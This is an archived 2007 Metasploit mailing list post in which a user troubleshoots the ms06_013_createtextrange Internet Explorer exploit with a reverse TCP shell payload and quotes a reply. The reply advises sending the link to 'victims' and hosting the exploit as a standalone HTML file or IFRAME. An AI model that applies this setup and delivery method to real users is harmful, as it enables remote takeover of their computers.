Metasploit mailing list archives
Internet Explorer createTextRange() Code Execution
From: eresemeth at gmail.com (Rory Garton Smith)
Date: Wed, 4 Apr 2007 19:34:08 +0800
Thankyou for all responding so fast. I did what you said, however it didn't quite work. My friend and I were trying to exploit his computer this time, using the same as before (windows/browser/ms06_013_createtextrange) with the payload as (generic/shell_reverse_tcp), my local ip is 10.1.1.5, his router IP is (for the sake of conversation) 124.181.130.145. I set up the exploit so that SRVHOST - 10.1.1.5 SRVPORT - 49160 (A port I have forwarded from my router to my computer which is 10.1.1.5 obviously) LHOST - 124.181.130.145 (His IP) LPORT - 5000 (A port he has forwarded from his router) This exploit ran in the console and came out with the same as last time [*] Started reverse handler [*] Using URL: http://10.1.1.5:49160/PwPYpHE [*] Server started. [*] Exploit running as background job. msf exploit(ms06_013_createtextrange) > Upon this, I did as was suggested previously, and sent him the URL http://10.1.1.5:49160/PwPYpHE and then opened it myself in internet explorer, as did he. However, all that came up was a series of numbers moving upwards towards 100. He has no firewalls on and neither do I. He was using internet explorer 6 which is the target I was using as well. I'm sure there is some critical error I made..perhaps confusing server and host or similar? Any assistance would be wildly appreciated, Thankyou So much, sorry to trouble Erez On 4/4/07, Donnie Werner <morning_wood at frame4.com> wrote:
All of the browser exploits work the same way -- you run the exploit,theexploit creates a listening web server and a URL handler. To get code execution, you need to send vulnerable clients to your web server. How you do this depends on the situation, but the easiest way is to just email or instant message the link to the victims.I have had very good success with client side exploits in Metasploit. My best results come from launching the exploit, create a local html file pointing to the exploit server. Open file via browser, right click link and save as. What you have now is a standalone html file with all the code in it. Simply host this file or imbed as an IFRAME, send your targets to your hosted file. enjoy! This has worked nearly flawlessly, and there is no need to keep your MSF open, running, or listening. cheers, Donnie ( M.W ) Werner http://www.zone-h.org
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070404/2a4d8229/attachment.htm>
Current thread:
- Internet Explorer createTextRange() Code Execution Rory Garton Smith (Apr 03)
- Internet Explorer createTextRange() Code Execution H D Moore (Apr 03)
- Internet Explorer createTextRange() Code Execution Donnie Werner (Apr 03)
- Internet Explorer createTextRange() Code Execution Rory Garton Smith (Apr 04)
- Internet Explorer createTextRange() Code Execution Donnie Werner (Apr 04)
- Internet Explorer createTextRange() Code Execution Donnie Werner (Apr 03)
- Internet Explorer createTextRange() Code Execution H D Moore (Apr 03)
- Internet Explorer createTextRange() Code Execution Michael Wood (Apr 03)